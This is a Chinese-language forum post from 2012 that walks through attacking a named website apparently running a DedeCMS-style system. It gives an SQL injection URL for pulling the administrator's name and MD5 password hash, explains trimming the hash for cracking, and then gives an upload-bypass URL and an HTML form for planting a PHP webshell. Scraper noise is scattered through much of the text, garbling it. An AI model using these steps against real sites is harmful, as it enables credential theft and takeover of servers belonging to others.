①注入漏洞。
3 F7 {- E' u7 d& z% l1 x这站 http://www.political-security.com/# M9 q0 x6 u, P5 l: `6 N
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
m! g+ y- v+ @* i% t. j) [www.political-security.com/data/mysql_error_trace.inc 爆后台" U$ p) K) W( b/ \& q' I5 e
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
! C7 z7 k h% g3 y然后写上语句
% U; j' ^' w) w, S查看管理员帐号) [6 l; J( T. R% @
http://www.political-security.co ... &membergroup=@`
5 K! V" U$ O+ N( V3 l$ x
: W$ s1 R H$ K3 l8 O0 t; @2 H9 `admin
" Q. f/ K4 Q* r, m3 L% z: R! M k3 r2 D6 z" a# L
查看管理员密码
7 u) M% W0 a& d, _4 g5 T1 J http://www.political-security.co ... &membergroup=@`
+ _7 @) h8 G# m) i h+ x' W/ C! x: I+ i2 T
8d29b1ef9f8c5a5af4298 z: `( k+ P" n# z( Q6 r5 W
8 U# R0 Q( D: j& }3 D) U查看管理员密码3 y5 f5 N9 Y$ b+ z2 ~
. H" _. \6 @+ ]# A) h1 Y
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5% J( l; m w% h
" v; B4 D$ h: \! Y4 w0 D% x
8d2% Y6 N! e4 j* U3 B0 f
9b1ef9f8c5a5af429 W; S" D* s: {7 Z7 q4 P
97 y# y t% x5 y3 ?" I7 d5 F \
0 _. [( A) i; n3 L) }cmd5没解出来 只好测试第二个方法5 M1 z' n) |# ~) O3 {0 u
* X0 G; l( J- X9 u7 N7 g5 n
! w! l. K; Y! m6 C) ~( n
②上传漏洞:( ^& }/ B( l7 r8 b. T* |
: o; O: l% t; \只要登陆会员中心,然后访问页面链接* H' Q5 c6 p& v! s
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”0 g3 N0 Q3 M- y
* f+ ], b6 O& B; A5 m" E
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
- q8 F0 O. S5 g# i, p
. R+ T L- u4 ]: }$ u' Y2 ]于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm" w; A0 t, j& G0 a* t+ ?( t4 D# B
; d; U. L7 x" C( r; i<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
" _) A- v! Z9 [/ r+ Y* a$ C) s或者$ v7 `0 R4 @' g7 X
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对